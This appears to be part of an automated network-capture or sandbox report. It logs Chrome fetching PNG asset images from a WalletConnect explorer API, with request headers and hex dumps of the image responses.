                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:26 UTC949INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 37 39 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 64 33 37 65 30 38 35 63 36 64 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:26 GMTContent-Type: image/pngContent-Length: 13794Connection: closeCF-Ray: 8336f3d37e085c6d-MIACF-Cache-Status: MISSAccept-Ranges: bytesAccess-Control-Allow-Origin: *Cache-Control: public, max-
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 90 00 00 01 90 08 03 00 00 00 b7 61 c6 fe 00 00 03 00 50 4c 54 45 1d 26 43 12 14 2c 1d 26 43 12 14 2d 12 14 2d 14 18 31 14 18 31 19 20 3c 17 1c 37 1a 21 3c 16 1c 36 1b 23 40 1b 23 40 18 1e 39 1c 25 41 1d 26 43 12 14 2c 14 17 30 18 1e 39 14 18 31 13 16 2f 19 1f 3a 13 16 2e 17 1c 36 15 19 32 19 20 3b 1b 23 3f 13 15 2d 1a 21 3d 16 1b 35 13 15 2e 18 1d 38 1d 25 42 17 1d 37 1c 24 41 1c 24 40 16 1a 34 1c 25 41 1c 25 42 14 17 2f 1b 22 3e 12 15 2d 15 19 33 12 14 2d 1a 20 3c 15 18 32 1a 21 3c 18 1e 38 15 18 31 17 1c 37 15 1a 33 1d 26 42 19 1f 3b 1a 22 3d 1b 23 40 12 81 c8 16 1a 33 1a 22 3e 08 a1 d5 07 a4 d6 15 76 c4 06 a7 d7 12 7f c7 07 a6 d7 19 20 3c 12 80 c8 04 b2 dc 04 af db 08 a3 d6 13 7d c7 14 16 2f 11
                                                                          Data Ascii: PNGIHDRaPLTE&C,&C--11 <7!<6#@#@9%A&C,091/:.62 ;#?-!=5.8%B7$A$@4%A%B/">-3- <2!<8173&B;"=#@3">v <}/
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: a5 a5 e5 27 11 a2 af 9f 8c e5 c5 48 e2 cb 4a 83 6f dc 5f 3b 6b eb d6 2d f3 ee 87 3f af 28 92 e9 27 63 22 2b 9d d6 41 5f 3f 46 24 4a d6 97 95 55 04 87 df 9f 37 6b eb d6 59 6b ef df 0e 2e 2d 8b 97 c4 e4 61 31 9f 40 c9 a7 10 32 0c 43 f4 53 2a 6e 7b 47 cb 49 88 4e 90 ff c5 ac e0 62 59 b2 b0 50 87 59 f2 84 31 b2 e2 a0 a9 09 9d a3 44 7b 87 bf 89 ef 2d 14 0d d3 61 16 1c 5d 0b d1 b7 8c c1 f2 52 4a b7 d4 d6 26 24 c4 c6 7a 7b 7b 7b 7b 78 78 7b 78 83 ff 7a c7 c6 26 44 d7 46 df 78 93 8f e4 e9 e2 d9 04 cd 81 c8 2a ee 47 d7 46 77 88 e2 8d 47 89 8d ae ad 9d 57 1a 2f c2 62 2c 75 da 26 ba 15 a2 af 5f 88 0d 2b bb 11 5d 9b e0 ed ad b8 f7 ce 44 d7 c6 06 a7 80 71 c1 76 96 18 ac 30 3b 28 b6 36 9a 22 89 87 b7 77 42 6d f4 ed a2 18 2c 59 97 93 4b 4f ef fb be 3a 43 df 14 31 29 9e
                                                                          Data Ascii: 'HJo_;k-?('c"+A_?F$JU7kYk.-a1@2CS*n{GINbYPY1D{-a]RJ&$z{{{{xx{xz&DFx*GFwGW/b,u&_+]Dqv0;(6"wBm,YKO:C1)
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: 72 93 e0 a3 ab 32 2d 2d 2b 68 96 f7 54 cd 8c 30 dd 23 df ea fd a7 09 b3 78 0e 44 ca 5a ce 9c 0b 0e 0e c6 9f 46 12 25 84 93 80 6b 0e de b3 d6 6e 81 65 36 30 62 e2 49 2f 4b ef 3c cf fb 91 a3 47 db af 50 18 39 43 66 04 74 49 e8 c9 ad de ab 21 a3 ac 7d 96 00 8c 30 5b 3e c6 85 78 0e 14 16 fd 1e 7e 32 28 e8 e4 49 42 89 c2 49 db e8 22 4e 94 ca ca 4a ff 70 07 ef 59 d0 46 56 41 18 31 45 ce 45 af 5a bb 6a b4 3d de 23 4a 63 0b 8f e4 eb 8b a7 c9 22 94 64 5d f1 76 80 7c 3e 56 6d 05 3d d2 97 d1 fa 31 2d a4 77 0c 52 d4 72 e5 cc 19 70 86 06 75 55 a2 dc 26 59 95 69 57 c3 1d 0e 42 77 c9 2a ef 04 9a 46 fa 0a 8b a2 57 af dd b2 65 ed ec b1 f7 ef 5f eb 30 b6 02 3a 37 49 65 5a 9a ef 5a d8 96 5d 3b 81 71 23 0c 0b f1 8c 41 ca aa 6f 80 b7 5c dc 09 49 97 74 6a 93 ab b7 1d 1c d6 ae
                                                                          Data Ascii: r2--+hT0#xDZF%kne60bI/K<GP9CftI!}0[>x~2(IBI"NJpYFVA1EEZj=#Jc"d]v|>Vm=1-wRrpuU&YiWBw*FWe_0:7IeZZ];q#Ao\Itj
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: a9 05 95 65 c1 6c ad 8d 68 29 64 18 7e 7e d0 0c bd c0 7e c5 48 f7 19 d7 6e a4 3e a7 f4 81 f7 c8 82 48 68 23 1d a6 96 89 95 08 11 8a 4c ac 3c 91 f8 c8 d1 2a 2f 5c 10 f9 86 d2 c7 27 32 a2 9d 90 61 f8 bc a2 1f 19 7f 0b 4e 54 e5 03 3f 47 dc e1 8d 14 45 c5 28 8c 98 c4 20 f1 cf 9f cb 44 56 26 fd 91 e7 91 f7 55 5c b6 2a 52 f5 29 0c ce 91 44 48 23 a3 13 2a 84 5d 5f 57 e8 a3 95 10 7c 5e b5 d8 2f 80 c0 de 3e f1 79 81 2a 1f b8 91 db 89 13 61 16 5d 30 b1 3a b1 48 28 ef 11 93 fe c2 a2 c4 c8 84 ea f8 02 2b 4f 91 a4 ba 9a 72 25 fb d9 6a 7c 10 6f bf 89 d4 2b 50 ac 5a a1 a2 eb d4 f2 ad de 37 76 9a 62 62 1c 55 16 d9 02 57 ba 05 09 cf 45 79 9e aa d7 f5 44 2c af c1 1a 69 89 2c 8a ea 6f 02 42 f5 8f 2a 8a ac 5e 31 31 b2 02 e9 6f 67 22 2c 8a 9c 4d f1 c0 c8 7d a8 b9 45 fc f3 08
                                                                          Data Ascii: elh)d~~~Hn>Hh#L<*/\'2aNT?GE( DV&U\*R)DH#*]_W|^/>y*a]0:H(+Or%j|o+PZ7vbbUWEyD,i,oB*^11og",M}E
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: 7a eb d3 16 02 be 5f 92 b8 60 e5 7c 08 7e 99 9f e8 87 31 e1 63 e0 40 13 ac 30 28 f5 17 98 cd e7 cf 4f cd 66 a1 43 40 8f 80 73 84 a2 10 bf 1c 5f bf e3 8a db 9f 6d 3e 2e 07 04 b8 8d 04 85 28 45 0a e8 3d 1d 74 85 e0 fd 31 11 aa 24 44 0c 46 7c 00 23 c9 c1 90 46 52 cb 10 66 f6 ee 04 30 f2 92 c2 c8 ca f5 f8 fb 2e 3e af 80 8f cb 01 7e 67 7e 27 4a 41 73 74 d3 14 82 fb c8 81 f6 c1 c0 f9 a1 00 de c8 cb 37 98 31 53 bb 77 80 38 47 c8 8c b4 fb 08 92 fb 08 f0 3b f9 3b 54 31 be d2 fb a6 bf 7a 4c 0d 80 8f e3 bf 40 91 58 8a 89 ec 68 2c 4e 13 3b 2c 2f 38 75 25 c4 fe 2d a5 05 c9 cc 6d af 8c 69 0f 30 b5 ba 96 e3 f8 fa 1d 33 dd 14 fd 71 99 f0 e1 7b 79 24 f8 d2 4a 50 8e 02 1a e5 a0 25 c4 34 39 aa 28 f5 77 98 62 e0 01 10 3a 01 e8 63 87 89 ce c1 18 79 fd bc b0 90 c9 fd 95 30 ed
                                                                          Data Ascii: z_`|~1c@0(OfC@s_m>.(E=t1$DF|#FRf0.>~g~'JAst71Sw8G;;T1zL@Xh,N;,/8u%-mi03q{y$JP%49(wb:cy0
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: 34 35 e5 7c 7c 7b cc ab 03 1d 53 ed fa 18 8f b1 9e a9 2d 9b 81 38 7e d1 2d df 8b 21 21 21 21 0a 1f a1 a1 07 76 78 75 ac 95 17 91 2d 27 1b 1d 42 be 0e b5 10 73 a4 38 c7 8b 26 2f 2b 10 11 fb 3e 7a f4 18 97 87 60 18 56 60 2a 91 a5 94 bd 29 0d 08 f2 fa d8 d4 d4 d4 f4 f1 ed b1 63 f8 bd 76 c4 2d e7 8c 61 a1 0e 42 c9 31 36 10 cb a6 9c 55 f8 b8 04 7c a4 85 bc 25 af 97 5b 53 85 d8 98 7c 19 6a 21 86 58 40 8e 1b 1d 1b 6e e0 93 8e 4e 7c f4 e8 61 dc c3 c6 dc c5 a5 b5 40 84 88 c5 88 e8 a9 44 96 52 54 5c e1 17 b4 eb 23 e8 97 8f 1f df be dd 75 cc cb cd cd cd cd cb cb cd ed ed cb 14 44 27 a1 da b2 89 65 8f 2f fa 2b 7c 84 86 86 a6 ad db 45 51 b2 8f c1 2e 86 e4 ab 50 0b c9 6b fe f3 2d 1d 21 6e 6e e0 fc d0 8d 8f 0e 2c 37 77 01 5e 50 cc e5 83 24 3f be a8 b8 22 20 c8 eb ed c7
                                                                          Data Ascii: 45||{S-8~-!!!!vxu-'Bs8&/+>z`V`*)cv-aB16U|%[S|j!X@nN|a@DRT\#uD'e/+|EQ.Pk-!nn,7w^P$?"
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: df 94 65 cb 0a 5a d9 cf 66 8c d1 f7 b1 7f 6f 83 0c a1 58 87 5a c8 72 51 f3 de 03 eb 48 d8 7f e0 62 9a b2 8f d3 21 21 21 67 17 45 88 2d 74 65 c4 02 2b aa db 43 96 ac 9d 49 93 26 ad db b3 17 1f 65 75 75 7f bd 41 2c d8 ce 64 0c de af 54 67 52 4a 57 77 79 4e 2b c5 42 d4 42 0c 5a 45 57 eb 48 d7 db 17 da 2e 84 f0 11 12 72 f6 91 ee 7a 04 08 d9 4f eb c6 81 97 fd fb 1b aa 64 08 cb d1 70 1f 93 26 d1 35 52 57 8c 0e a2 58 49 c5 c8 5a 8e a6 54 91 ad b6 f7 f1 21 65 1f 40 c8 c5 8b 17 6f 6d 48 d1 99 11 24 45 5d 87 74 60 d3 5f 29 62 76 93 19 23 22 ff bf 68 eb 58 b7 b7 2e 1f a3 5a ea 6b bd ef cc 29 30 c0 9e 6e 3a 30 a9 2b 07 42 d2 f0 8f 84 ed 03 eb 22 60 f8 a3 f4 28 17 03 aa c5 18 05 91 d5 ed 21 09 46 c1 a6 ba 3d cd 22 56 f3 bc c3 7d d0 a7 c1 af 40 44 55 29 15 42 cc 0d c4
                                                                          Data Ascii: eZfoXZrQHb!!!gE-te+CI&euuA,dTgRJWwyN+BBZEWH.rzOdp&5RWXIZT!e@omH$E]t`_)bv#"hX.Zk)0n:0+B"`(!F="V}@DU)B
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: e7 29 94 38 3f 8a 4b 11 cc 61 de c8 20 34 ff d1 62 ea 6d c9 c9 bc 8a 21 36 da ee 6c 83 1a f9 67 aa b8 63 f2 22 a4 d3 f6 01 23 c4 d0 00 43 2b 1f 4e 9b 76 de 47 31 b0 26 df ba 35 fc 27 95 e9 9c 41 8f b0 60 04 93 4c 7b 04 e9 c3 d9 f9 a1 3f a2 ad 11 1b 14 0b 81 f6 91 19 01 31 26 60 84 18 da 60 e2 ca 87 8b ef f9 c8 07 d6 e4 25 b7 54 f6 87 06 71 e8 d2 ef c3 ad 47 70 75 99 32 65 ca 9a 87 fe fd 50 73 6d b6 b5 41 9d 34 f2 41 bb 3f 20 85 18 9a 03 23 c3 7d ce ff 41 0c ac 31 a0 41 d4 f0 13 78 c1 60 dc 88 91 cb c5 47 6a b7 ee 9a 25 d3 df 56 1b 23 f8 bc 82 db f6 27 e0 03 66 44 c0 09 31 34 07 e7 08 7e 80 80 06 19 73 6b 8d fa 48 8f 81 11 a6 a7 56 2b e6 1f 07 2f c4 f9 71 66 88 16 46 6c 50 a3 90 cc c7 90 3e e2 e0 7c c0 0a c1 a7 56 dc 79 62 60 8d 19 be 86 4e 51 1e 43 36 2d
                                                                          Data Ascii: )8?Ka 4bm!6lgc"#C+NvG1&5'A`L{?1&``%TqGpu2ePsmA4A? #}A1Ax`Gj%V#'fD14~skHV+/qfFlP>|Vyb`NQC6-
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: a8 6d e8 0b 1f 1f 1f 5c 49 9b 13 20 85 7a 29 06 7c 00 21 73 b4 c4 b0 9f e0 55 52 23 9c 91 1a 7c 6a 75 5d 09 7d 55 82 17 e1 ce 9d 3f 88 67 92 a2 88 69 52 f2 28 23 04 f1 49 35 d3 a1 8c 4c c7 cf 91 2e 2b a1 86 a1 19 47 8e f8 f8 28 39 d9 7e cf 75 e9 74 ca 50 0a 1f 5a 56 93 01 21 73 c0 9c 49 82 ec 91 1a d0 23 66 9d d7 41 d3 47 1d c1 ab 70 fe fc 1d 7c 6e 51 09 09 43 47 90 47 c1 8d c0 f5 c8 f4 5c c7 2e 46 0c d1 39 81 db 0e 1f 39 d2 ae 84 70 72 8f 38 e2 49 43 ad 49 4a d7 de 07 10 d2 47 6b 0c c1 d4 5a 32 7d 32 04 67 6b 92 64 82 11 66 ca ab 98 f5 93 a6 6f 3e 7c f8 30 51 04 45 93 90 52 13 62 d6 6f 0e 69 14 b3 01 78 8f c0 44 99 3c 39 77 49 b3 d4 4c 39 8b 19 6a 9b 76 f7 30 9e a5 cd 09 21 05 f4 09 69 ac e9 8d 49 e9 02 5b 33 d2 50 30 30 22 a4 8f 99 93 e0 55 5c 23 54 19
                                                                          Data Ascii: m\I z)|!sUR#|ju]}U?giR(#I5L.+G(9~utPZV!sI#fAGp|nQCGG\.F99pr8ICIJGkZ2}2gkdfo>|0QERboixD<9wIL9jv0!iI[3P00"U\#T


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          49192.168.2.549765104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:25 UTC486OUTGET /w3m/v1/getAssetImage/692ed6ba-e569-459a-556a-776476829e00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:27 UTC951INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 30 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 64 33 37 38 39 39 37 34 38 66 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:27 GMTContent-Type: image/pngContent-Length: 10062Connection: closeCF-Ray: 8336f3d37899748f-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: *Cache-Control: public, max-a
                                                                          2023-12-10 16:44:27 UTC418INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 90 00 00 01 90 08 03 00 00 00 b7 61 c6 fe 00 00 02 6d 50 4c 54 45 15 1c 2f 62 68 8f 8a 92 b2 45 4a 75 14 1b 2e 63 69 90 8c 94 b4 64 6a 91 8b 93 b3 13 1a 2d 60 66 8d 44 49 74 6b 72 97 81 88 aa 60 65 8d 8c 95 b4 16 1d 30 61 67 8e 13 1a 2c 14 1b 2d 12 19 2b 12 19 2c 15 1c 2e 43 48 73 4c 51 7b 5b 61 89 1a 21 35 63 69 91 19 20 34 8d 95 b5 65 6b 93 46 4b 76 18 1f 32 66 6c 94 10 17 29 64 6a 92 11 18 2a 17 1e 31 1f 26 3c 62 68 90 1c 23 37 1d 24 38 21 28 3e 89 91 b1 0e 15 28 1b 22 36 88 90 b0 5f 65 8b 2a 31 48 87 8f af 8e 96 b6 20 27 3c 17 1e 32 11 18 2b 26 2d 43 5e 64 8a 8f 97 b8 47 4c 77 5b 61 86 23 2a 40 65 6b 92 60 66 8c 1e 25 3a 31 37 4f 5c 62 88 55 5b 7f 5d 63 89 48 4d 78 67 6e 95 32 38 53 56 5c 81 28
                                                                          Data Ascii: PNGIHDRamPLTE/bhEJu.cidj-`fDItkr`e0ag,-+,.CHsLQ{[a!5ci 4ekFKv2fl)dj*1&<bh#7$8!(>("6_e*1H '<2+&-C^dGLw[a#*@ek`f%:17O\bU[]cHMxgn28SV\(
                                                                          2023-12-10 16:44:27 UTC1369INData Raw: 7d 59 5f 83 77 7e 9c 57 5f 79 52 58 80 70 77 9c 3f 45 6d 2b 32 49 33 3a 52 0c 13 25 37 3e 55 4f 57 70 61 68 84 34 3b 52 54 5a 83 29 30 4d 30 37 58 50 55 7f 61 68 8e 42 49 67 43 4a 69 54 5a 7d 8a 92 b3 8b 93 b4 59 61 7c 54 5c 76 4c 54 6d 70 78 95 41 48 60 59 5f 87 8c 94 b3 45 4b 6a 4b 52 73 63 6a 86 2f 36 4c 72 79 97 5c 63 7e 39 40 57 3d 43 6a 21 28 41 15 1c 30 47 4e 6e 75 7d 9b 74 7c 99 7e 86 a5 6e 76 93 63 69 8f 4a 4f 79 6b 72 8f 65 6c 88 5d 63 8b 7e 85 a8 61 67 8f 73 7a 9e 76 7d a0 68 70 8c 48 50 68 46 4d 66 79 80 a3 1c 23 39 3b 40 66 2d 33 4e 3a 41 5d 6c 74 90 35 3d 53 69 70 96 33 39 5c 37 3d 59 66 6e 8a 7c 83 a6 3b 42 5f 39 40 5c 6d 75 92 2d 33 53 35 3b 5f 64 6b 92 93 9c bd 5d 64 89 44 4a 74 7a 81 a4 65 6a 92 62 67 8e ed 0c 5e bb 00 00 24 9c 49 44 41
                                                                          Data Ascii: }Y_w~W_yRXpw?Em+2I3:R%7>UOWpah4;RTZ)0M07XPUahBIgCJiTZ}Ya|T\vLTmpxAH`Y_EKjKRscj/6Lry\c~9@W=Cj!(A0GNnu}t|~nvciJOykrel]c~agszv}hpHPhFMfy#9;@f-3N:A]lt5=Sip39\7=Yfn|;B_9@\mu-3S5;_dk]dDJtzejbg^$IDA
                                                                          2023-12-10 16:44:27 UTC1369INData Raw: 8c 50 3c f4 2f b1 1a c3 b5 9d 65 5b 7d 13 a2 1e 58 bf c9 2a 81 2c a3 3f 09 0b 2b 18 bb 15 79 62 46 ce c4 13 21 72 79 56 d3 7a b3 0e 52 5a fe 03 21 cc b8 ed e6 86 3a 27 3a dc 08 21 42 85 59 6b aa 64 f0 cd 88 ff 90 8a a3 0f 9c 2a 5b c5 96 34 f1 40 08 93 65 cc 1d 2e 36 22 28 1e fa 0b 09 5d 70 fa 51 45 82 8f 11 c2 14 0f e3 d7 fc 58 14 24 5d e8 ff 8f ff 37 88 64 8d f7 ca 22 eb d8 ee e8 9e 45 08 29 cc 58 f3 3c 08 3e e2 f1 0f 14 26 cb 3b bd 23 9c 35 67 e2 99 10 26 ed 5b fd ce 04 bb 88 5f 40 1a 94 d7 72 a9 d5 45 7c 78 24 24 7e 22 c7 8c 41 96 d1 0f 20 8d e2 5a df 8e c8 0d b3 13 a2 0d c8 5c 59 10 03 42 66 4d 10 a2 65 11 a3 37 f2 79 33 cb 84 de 08 c1 09 dc 96 f9 2e 0d 16 ad 59 83 a4 8a 88 b3 6f 22 57 b9 b0 e1 91 10 1c 57 06 ac 2c 36 d2 62 c8 c3 cf 0e 69 98 ac f1 6a
                                                                          Data Ascii: P</e[}X*,?+ybF!ryVzRZ!:':!BYkd*[4@e.6"(]pQEX$]7d"E)X<>&;#5g&[_@rE|x$$~"A Z\YBfMe7y3.Yo"WW,6bij
                                                                          2023-12-10 16:44:27 UTC1369INData Raw: 8a 87 76 90 a8 b9 ab dd d7 05 8b 17 79 ff e1 e6 14 92 5c fa 65 60 c8 9d af d7 65 fd c7 b7 55 8b c0 85 db 87 0d 30 dd cc ae 43 6f de 7f a9 d0 db 2b ba 40 70 9e 17 9e 5f 32 f8 f3 0f 0f 16 ab 85 42 fc dc 9d 8d 4b 42 ee 7c 7d 70 dd b9 73 19 a9 df 11 de 47 c9 6f c2 da 4d 26 28 1e 32 45 10 e3 81 d1 2b 3c b7 13 98 1c 85 9c 3f 1f 5e 71 ff e1 ee c5 ea df 48 02 27 c8 a5 5f 2e 09 5c 14 12 b2 ec ce 97 5f ed ca 38 f2 9d 0f 42 f0 a6 d5 11 32 78 67 04 13 e9 92 87 ee 0e f2 bd c8 2a 0a 04 02 01 13 1d f7 7f 78 b0 39 9b 58 1b b0 56 38 29 24 30 30 30 24 71 d9 97 bb d6 2d fd 3e 40 88 13 c4 77 5e 08 d1 12 49 fd ef 0c 22 10 42 51 05 97 0a bd 2a 13 0a f8 c1 e7 c3 4b fe 7a b0 38 5b 9d 42 e2 7f ff c7 7e 93 b0 0b b1 13 92 b8 ec ce d7 07 cf 7d 8e 13 5e 6d ef 04 4e a4 d6 c6 71 7e 50
                                                                          Data Ascii: vy\e`eU0Co+@p_2BKB|}psGoM&(2E+<?^qH'_.\_8B2xg*x9XV8)$000$q->@w^I"BQ*Kz8[B~}^mNq~P
                                                                          2023-12-10 16:44:27 UTC1369INData Raw: ff 6c 5e 64 76 46 4f b1 91 0b 79 f8 20 0d 9d de 75 bb 30 81 ff f1 12 58 f2 f3 43 7b 99 5c b8 a0 42 98 cd 84 c9 3c 9e fb 3e 00 b7 7f d5 20 57 c7 77 bc 4e be ce 81 ef d7 91 86 be 36 d6 56 f8 31 eb 5e f8 d9 0f bb b3 c9 59 a8 f0 8b 90 49 2d 4c 4e 25 e3 f3 0f 7f a2 d6 76 ec 68 04 17 5e e2 41 61 f4 b6 f7 25 96 e0 2f 78 91 15 9f fd fc 83 f7 97 c0 b9 12 f2 e1 b2 f8 95 bd 68 12 40 90 5a 61 52 7f 3a cd 81 cf dc 50 18 dd 72 23 92 c7 17 84 b7 fe f5 70 73 36 6b 13 c9 c2 44 08 43 c8 a2 10 a6 37 38 0b 27 e5 b8 30 b3 93 d6 70 42 c8 93 36 a6 55 fa 2f a6 87 c4 87 4b e0 5c 0a 61 2a 8b 8b 12 99 af 1a 96 c6 db 52 39 24 a4 f7 e7 87 9b 99 56 69 1f bf 09 9c 33 21 1f b0 b7 6b af 3b 57 5d 9a c3 91 25 6b db dd 87 0f 36 6b 7d bd 04 ce bd 90 0f 97 c5 5d bb 26 aa 68 0e cc 59 0e d2 d0
                                                                          Data Ascii: l^dvFOy u0XC{\B<> WwN6V1^YI-LN%vh^Aa%/xh@ZaR:Pr#ps6kDC78'0pB6U/K\a*R9$Vi3!k;W]%k6k}]&hY
                                                                          2023-12-10 16:44:27 UTC1369INData Raw: 4e 09 41 28 26 7a db 19 01 9f c7 e7 f3 79 bd ed 57 1e ed dc 6f a2 34 1a c7 cd 5d 2c 66 96 90 9c 9e 63 b8 5a a9 74 33 4c d4 bd 90 f2 c4 c4 45 7b ec 79 12 d5 8c 3b 29 26 d6 c5 d2 69 11 ef 56 96 56 a7 92 5a 39 81 93 24 a7 96 2c 26 46 0a fa ca 22 05 27 98 b1 a3 51 1b 04 ed a7 0e 34 1b f5 2c 8d 37 94 04 33 46 8c 67 26 c5 bb 29 29 7a 12 21 7f 2e f9 66 cb 2f df ca 30 b6 0a 14 4d cb 92 0b 86 4b 93 70 7b 0f 38 33 04 9e 53 9b 3a 86 89 a4 e6 6d 7d 65 f5 f5 76 21 51 1b 0a 77 dc eb 3a 5b 60 94 ea 62 a7 5f c7 82 28 29 45 9b f2 72 56 4f 1c b3 91 5a 17 27 2e 37 42 42 1a 12 97 2d 62 0a e6 4c 9e c4 51 88 58 2a a5 64 79 cb 7b 3a 8e 65 08 49 66 d2 0a ae 56 0f f4 54 19 38 d5 98 85 28 45 d1 b6 17 fc c9 79 40 82 28 41 fb a5 a1 82 34 15 5b b7 20 92 62 e6 f4 f1 cc 78 57 31 e2 36
                                                                          Data Ascii: NA(&zyWo4],fcZt3LE{y;)&iVVZ9$,&F"'Q4,73Fg&))z!.f/0MKp{83S:m}ev!Qw:[`b_()ErVOZ'.7BB-bLQX*dy{:eIfVT8(Ey@(A4[ bxW16
                                                                          2023-12-10 16:44:27 UTC1369INData Raw: 1a d3 dc f8 c6 92 c0 22 84 79 c8 3e b2 a4 fd 4c 5f a3 35 76 66 41 11 21 4c 2f 8b 2e ee 5c 5f 5b 9a 99 64 3b 77 67 23 d3 c7 6e bf 08 ea ed 57 8d e9 ff 76 ac 48 65 4e ef e9 cf fd 23 00 27 58 33 94 4a fc 62 95 41 cf b9 a7 a7 d8 40 a2 e6 ae f6 70 1e eb 03 ac 82 ba 84 28 5e fb c9 6b 11 c9 c6 99 95 d7 20 2a 96 52 45 6f ea 1e 1e 9f b8 38 f1 ec d7 5f 5f 1d 3e 54 69 50 88 25 8e 25 41 fb 1d df 50 bc fc c2 b1 78 52 cd de 34 2c c7 85 03 c3 06 c7 4a 3b 47 41 3a 63 63 5f 9b a0 9e f5 3d 2a 41 70 9d a0 b0 ec 76 df e9 fd 66 2c d6 b1 bf 13 51 62 4c 65 8c 4e 2e 8a 2b 5e 51 f9 ed b7 86 b4 a7 32 15 d3 3a 3d fd df 12 4b 75 3a 45 c4 bb 89 9a ea 78 a1 9c bd a0 42 a8 89 dc 0b 55 0a 2e be 27 c9 02 8a 55 45 b4 dc eb 75 fe c2 e4 89 fa 84 d6 17 5d fb 8b 4c 4c 90 cc f8 af 29 91 48 2a
                                                                          Data Ascii: "y>L_5vfA!L/.\_[d;wg#nWvHeN#'X3JbA@p(^k *REo8__>TiP%%APxR4,J;GA:cc_=*Apvf,QbLeN.+^Q2:=Ku:ExBU.'UEu]LL)H*
                                                                          2023-12-10 16:44:27 UTC1369INData Raw: 6d 96 28 0f b7 11 6f 84 84 6a 85 b9 13 39 46 e8 e3 f5 0a 2a 8c 1e 79 f2 a8 70 d5 5c 08 51 a6 ae 79 5d 89 e9 20 3e bc 01 89 30 59 c4 a9 c1 60 0f af 87 5e 2d 59 29 19 eb 93 55 4e 06 03 01 ce d1 28 b6 bd 18 0c f7 2c cb e8 b9 10 82 14 26 f5 e7 a8 a0 4b d1 7b 62 af 17 b7 5c 2a 49 f0 68 5f f7 5c 88 36 db 36 91 1e 8d 41 97 89 f7 88 31 55 f3 93 9b 16 9e e0 b8 3f 85 c8 95 03 9d d0 36 ea 13 08 a3 54 07 ae de 28 5c 55 e7 3f 21 a4 32 20 f7 42 71 10 2c 58 be 21 15 17 6d bb 5a 36 73 d0 c3 6c 84 54 1f cd 31 70 78 54 c3 ec 10 89 64 79 2d 2f f2 dd b5 97 7a 2c 84 20 84 59 6b 72 a2 55 62 c8 99 f8 8a 88 1a d9 79 a3 97 ef 76 63 f7 4c 08 29 cf 28 5d 9d cc 99 f1 c8 73 41 6c 98 a9 f1 e4 0e f7 ed a5 9e 09 d1 12 99 3d 05 32 1d e4 dc 7d 07 51 b4 e9 e5 bd 42 b7 99 78 cf 84 c8 53 3b
